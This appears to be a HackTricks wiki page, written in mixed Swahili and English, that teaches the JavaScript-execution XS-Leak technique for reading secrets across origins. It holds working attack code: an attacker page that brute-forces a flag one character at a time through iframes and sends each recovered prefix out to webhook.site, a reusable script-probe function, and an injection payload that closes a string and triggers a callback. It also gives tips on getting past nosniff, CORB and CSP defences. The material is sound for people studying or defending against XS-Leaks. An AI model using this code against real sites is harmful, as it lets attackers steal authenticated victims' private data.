JavaScript Execution XS Leak

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Vinjari katalogi kamili ya HackTricks Training kwa ajili ya njia za assessment (ARTA/GRTA/AzRTA) na Linux Hacking Expert (LHE).

Support HackTricks

• Angalia subscription plans!
• Jiunge na 💬 Discord group, telegram group, fuata @hacktricks_live kwenye X/Twitter, au angalia LinkedIn page na YouTube channel.
• Shiriki hacking tricks kwa kutuma PRs kwenye HackTricks na HackTricks Cloud github repos.

Primitivu hii ya XS-Search hubadilisha kama response ya cross-origin inatekelezwa kama JavaScript kuwa Boolean oracle.

Mpangilio wa kawaida ni:

• Positive state: target hurudisha text inayodhibitiwa na attacker au content nyeti ambayo haitekelezi kama attacker JavaScript.
• Negative state: target hurudia text inayodhibitiwa na attacker kwenye sehemu inayochakatwa kama valid JavaScript, hivyo attacker anaweza kulazimisha callback kama window.parent.foo().
• leak: pakia target kwa classic <script src> na observe kama callback inawaka.

Hii kimsingi ni execution oracle, si timing oracle. Kitu pekee ambacho attacker anahitaji ni cross-origin script inclusion kinachofanya kazi tofauti kulingana na branch inayotegemea secret.

Kwa usuli wa generic XS-Leaks, angalia:

HackTricks

When This Works

Teknik hii ni practical wakati yote yafuatayo ni kweli:

• victim amethibitishwa kwa target origin.
• attacker anaweza kufanya browser ya victim iombe classic script kutoka target origin.
• Branch moja inarudisha content ambayo ni valid attacker-controlled JavaScript.
• Branch nyingine inarudisha content ambayo haiendeshi attacker callback.

Kwa practice, kesi rahisi zaidi ni search/debug endpoints ambazo:

• hurudisha text inayodhibitiwa na attacker wakati guess ni wrong
• hurudisha body tofauti wakati guess ni right
• huruhusu attacker kuchagua parameter kama callback, hint, msg, au reflected prefix/suffix

Basic Example

Server-side code ambayo itajaribu ${guess} kama flag prefix:

app.get("/guessing", function (req, res) {
let guess = req.query.guess
let page = `<html>
<head>
<script>
function foo() {
// If not the flag this will be executed
window.parent.foo()
}
</script>
<script src="https://axol.space/search?query=${guess}&hint=foo()"></script>
</head>
<p>hello2</p>
</html>`
res.send(page)
})

Kuu kuu ambalo hutengeneza iframes kwenda kwenye ukurasa wa awali /guessing ili kujaribu kila uwezekano:

<html>
<head>
<script>
let candidateIsGood = false
let candidate = ""
let flag = "bi0sctf{"
let guessIndex = -1

let flagChars =
"_0123456789abcdefghijklmnopqrstuvwxyz}ABCDEFGHIJKLMNOPQRSTUVWXYZ"

// this will get called from our iframe IF the candidate is WRONG
function foo() {
candidateIsGood = false
}

timerId = setInterval(() => {
if (candidateIsGood) {
flag = candidate
guessIndex = -1
fetch("https://webhook.site/<yours-goes-here>?flag=" + flag)
}

// Start with true and change to false if the guess is wrong
candidateIsGood = true
guessIndex++
if (guessIndex >= flagChars.length) {
fetch("https://webhook.site/<yours-goes-here>")
return
}
let guess = flagChars[guessIndex]
candidate = flag + guess
let iframe = `<iframe src="/guessing?guess=${encodeURIComponent(
candidate
)}"></iframe>`
hack.innerHTML = iframe
}, 500)
</script>
</head>
<p>hello</p>
<div id="hack"></div>
</html>

Mantiki ya mshambuliaji ni:

1. Anza kila candidate kama “good”.
2. Pakia response ya lengo kama script.
3. Ikiwa response inatekeleza window.parent.foo(), weka candidate kuwa wrong.
4. Ikiwa hakuna callback inayowaka, weka candidate na endelea brute-forcing.

Minimal Probe Pattern

Katika malengo mengi ya kweli, iframe haihitajiki. Uingizaji wa moja kwa moja wa script unatosha:

<script>
let hit = true
function miss() {
hit = false
}

function probe(url) {
return new Promise((resolve) => {
hit = true
const s = document.createElement("script")
s.src = url
s.onload = () => resolve(hit)
s.onerror = () => resolve(false)
document.head.appendChild(s)
})
}
</script>

Ikiwa tawi la “wrong guess” linaakisi miss(), basi:

• probe(...) === false inamaanisha callback ilitekelezwa au load ilishindwa
• probe(...) === true inamaanisha script ilipakia bila kuendesha attacker callback

Kwa uaminifu, tumia fresh script element kwa kila probe na ongeza cache-buster kama ?r=${crypto.randomUUID()}.

Modern Caveats

Lazima iwe classic script

Primitive hii inategemea browser kuchukua resource kama classic script. <script src=...> ya kawaida bila crossorigin inachukuliwa katika no-cors mode, na hilo ndilo hasa kwa nini pattern hii ya zamani bado ni muhimu cross-origin.

Usibadilishe kuwa type="module" kwa technique hii:

• cross-origin module scripts require CORS
• targets nyingi ambazo zinaweza kuingizwa kama classic scripts zita fail tu kama modules

MIME type na nosniff huamua kama payload itatekelezwa

Browsers za sasa ni stricter kuliko writeups za zamani. Ikiwa target inaweka X-Content-Type-Options: nosniff, browser itazuia script response ambayo MIME type yake si JavaScript MIME type.

Hiyo inamaanisha oracle hii mara nyingi hutegemea:

• kama target inarudisha application/javascript / text/javascript
• kama target inarudisha text/plain, text/html, au JSON
• kama nosniff ipo

Hii pia ndiyo sababu baadhi ya endpoints hutoa leak kwenye tawi moja tu: response moja inakubaliwa kama script, wakati tawi jingine linazuiwa au kuchambuliwa tofauti.

CORB inaweza kubadilisha observable result

CORB inaongeza tawi lingine la kufikiria. Ikiwa response inachukuliwa kama CORB-protected, Chromium inaweza kuibadilisha kuwa empty valid script response badala ya kuonyesha parse failure. Hivyo kwa baadhi ya endpoints:

• state moja husababisha normal script parse / callback
• state nyingine inakuwa empty script na onload pekee ndiyo fires

Hiyo bado ni oracle muhimu, lakini signal sasa ni callback vs no callback au onload vs onerror, si tu “JavaScript executed or not”.

CSP inaweza kuua attacker-controlled branch

Strict CSP kwenye target response inaweza kuvunja primitive hii wakati reflected branch si tena executable JavaScript. Public XS-Leak challenge writeups kutoka 2022 hadi 2024 mara kwa mara hutegemea detail hii:

• script-src 'none' inaweza kulazimisha attackers kubadili kutoka direct execution oracle
• CSP/SRI/CSP-report interactions bado zinaweza kuunda other leak oracles, lakini hizo ni za pages/techniques tofauti

Kwa hiyo wakati callback trick ya wazi haifanyi kazi, angalia response headers kabla ya kuacha endpoint.

Useful Variants

Callback-parameter endpoints

Target iliyo rahisi zaidi ni JSONP-style au debug endpoint inayokubali parameter kama:

• callback=...
• cb=...
• jsonp=...
• hint=...
• msg=...

Ikiwa tawi la “miss” linaakisi value hiyo verbatim ndani ya executable JavaScript wakati tawi la “hit” linarudisha content tofauti, unapata direct Boolean oracle bila timing measurement.

Syntax-preserving prefixes and suffixes

Wakati mwingine huwezi kudhibiti kikamilifu response body, lakini bado unaweza kufanya negative branch itekeleze:

• funga current string au function argument
• inject callback
• comment out trailing bytes

Kwa mfano, reflected branch kama:

showResult("<attacker>");

inaweza mara nyingi kubadilishwa kuwa:

showResult("");window.parent.foo();//");

If branch chanya does not reflect that payload, callback inakuwa oracle.

Combining with event-based oracles

If endpoint haiko stable across browsers, changanya execution oracle na generic script load events ambazo tayari zimefunikwa katika section index:

• callback fired
• onload
• onerror

Hii ni muhimu sana wakati branch moja inatoa valid JavaScript na nyingine inatoa blocked MIME / CORB / CSP behavior.

Related pages:

• Cookie Bomb + Onerror XS Leak
• performance.now example

Practical Notes

• Pendelea one bit per request na weka callback side effect iwe simple.
• Ukiprobe candidates wengi, ondoa <script> elements zilizowekwa hapo awali au tenga kila attempt ndani ya fresh iframe.
• Cache na service worker behavior zinaweza kuharibu oracle; tumia cache-busting.
• Primitive hii ni strongest wakati negative branch ni fully attacker-controlled JavaScript. Ukipata partial reflection tu, exploit inakuwa payload-shaping problem badala ya XS-Search problem.

References

• https://xsleaks.dev/docs/attacks/error-events/
• https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Vinjari katalogi kamili ya HackTricks Training kwa ajili ya njia za assessment (ARTA/GRTA/AzRTA) na Linux Hacking Expert (LHE).

Support HackTricks

• Angalia subscription plans!
• Jiunge na 💬 Discord group, telegram group, fuata @hacktricks_live kwenye X/Twitter, au angalia LinkedIn page na YouTube channel.
• Shiriki hacking tricks kwa kutuma PRs kwenye HackTricks na HackTricks Cloud github repos.